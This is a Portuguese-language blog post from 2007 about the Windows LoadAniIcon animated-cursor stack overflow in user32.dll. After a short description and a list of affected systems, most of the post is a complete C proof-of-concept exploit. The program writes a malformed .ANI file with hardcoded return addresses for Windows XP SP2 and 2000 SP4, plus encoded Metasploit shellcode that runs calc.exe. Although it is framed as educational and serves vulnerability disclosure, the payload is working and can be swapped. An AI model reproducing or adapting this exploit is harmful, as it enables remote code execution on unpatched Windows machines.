« Wine
phpDocumentor »

LoadAniIcon Stack Overflow, Windows

Foi comunicada uma nova vulnerabilidade no Windows, que pode ser aproveitada, por atacantes remotamente, para controlar por completo o sistema afectado.

bitela img: windows logo - Image Hosted by ImageShack.us*

A vulnerabilidade tem origem num stack overflow que pode ocorrer na função LoadAniIcon() presente no user32.dll; quando este renderiza um cursor animado com um header malformado.
Apresenta-se de seguida informações mais específicas sobre esta falha descoberta por devcode.

Hotfix/Patch:
None as of this time.

Vulnerable systems:

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 (Itanium)
  • Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 Service Pack 1 (Itanium)
  • Microsoft Windows Server 2003 x64 Edition
  • Microsoft Windows Vista
  • Microsoft Internet Explorer 6
  • Microsoft Internet Explorer 7

This is a PoC and was created for educational purposes only. The author is not held responsible if this PoC does not work or is used for any other purposes than the one stated above.

Notes:
For this to work on XP SP2 on explorer.exe, DEP has to be turned off.

PLAIN TEXT
C:
  1. /* ANI Header */
  2. unsigned char uszAniHeader[] =
  3. "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
  4. "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
  5. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  6. "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
  7. "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
  8. "\x61\x6E\x69\x68\xA8\x03\x00\x00";
  9.  
  10. /* Shellcode - metasploit exec calc.exe ^^ */
  11. unsigned char uszShellcode[] =
  12. "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  13. "\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
  14. "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
  15. "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
  16. "\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
  17. "\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
  18. "\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
  19. "\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
  20. "\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
  21. "\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
  22. "\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
  23. "\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
  24. "\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
  25. "\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
  26. "\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
  27. "\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
  28. "\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
  29. "\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
  30. "\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
  31. "\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
  32. "\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
  33.  
  34. char szIntro[] =
  35. "\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
  36. "\t\t\tdevcode (c) 2007\n"
  37. "[+] Targets:\n"
  38. "\t(1) Windows XP SP2\n"
  39. "\t(2) Kernel32.dll (ExitProcess)\n"
  40. "\t(3) Windows 2K SP4\n\n"
  41. "Usage: ani.exe <target> <file>";</file></target>
  42.  
  43. typedef struct {
  44. const char *szTarget;
  45. unsigned char uszRet[5];
  46. } TARGET;
  47.  
  48. TARGET targets[] = {
  49. { "Windows XP SP2", "\xC9\x29\xD4\x77" },            /* call esp */
  50. { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90" },   /* ExitProcess */
  51. { "Windows 2K SP4", "\x29\x4C\xE1\x77" }
  52. };
  53.  
  54. int main( int argc, char **argv ) {
  55. char szBuffer[1024];
  56. FILE *f;
  57. void *pExitProcess[4];
  58.  
  59. if ( argc &lt;3 ) {
  60. printf("%s\n", szIntro );
  61. return 0;
  62. }
  63.  
  64. if ( atoi( argv[1] ) == 1 ) {
  65. printf("[+] Getting ExitProcess address...\n");
  66. *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ),
  67. "ExitProcess" );
  68. if ( pExitProcess == NULL ) {
  69. printf("[-] Cannot get ExitProcess address\n");
  70. return 0;
  71. }
  72. memcpy( targets[1].uszRet, pExitProcess, 4 );
  73. }
  74.  
  75. printf("[+] Creating ANI header...\n");
  76. memset( szBuffer, 0x90, sizeof( szBuffer ) );
  77. memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
  78.  
  79. printf("[+] Copying shellcode...\n");
  80. memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
  81. memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );
  82.  
  83. f = fopen( argv[2], "wb" );
  84. if ( f == NULL ) {
  85. printf("[-] Cannot create file\n");
  86. return 0;
  87. }
  88.  
  89. fwrite( szBuffer, 1, 1024, f );
  90. fclose( f );
  91. printf("[+] .ANI file succesfully created!\n");
  92. return 0;
  93. }

This entry was posted by ponto on Wednesday, April 4th, 2007 at 5:26 pm and is filed under Microsoft, Segurança. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply